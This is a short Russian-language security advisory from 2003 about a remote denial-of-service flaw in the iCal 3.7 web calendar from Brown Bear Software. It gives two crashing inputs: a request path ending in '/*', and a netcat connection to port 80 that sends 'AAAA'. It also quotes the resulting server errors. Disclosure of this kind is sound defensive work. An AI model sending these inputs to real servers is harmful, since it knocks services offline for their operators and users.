Security Lab

DoS против iCal

Дата публикации:08.01.2003
Всего просмотров:1870
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: iCal 3.x
Описание: iCal (www.brownbearsw.com) – Web календарь, который можно просматривать и администрировать через Web интерфейс. Работа программы аварийно завершится при получении некоторых некорректных Web запросов. Пример:

1.

1-http//target/*
error message:Unable to write to D:\program files\iCl 3.7
Web Calender\*.cal (the server is down)

2.

2-nc target 80
 AAAA
[ enter ]
error message:Access violation at address 00403d8b in
module'ICAL.EXE' Read of address 0161c1af
Уязвимость обнаружена в Brown Bear Software iCal 3.7
Ссылки: ical 3.7 remote dos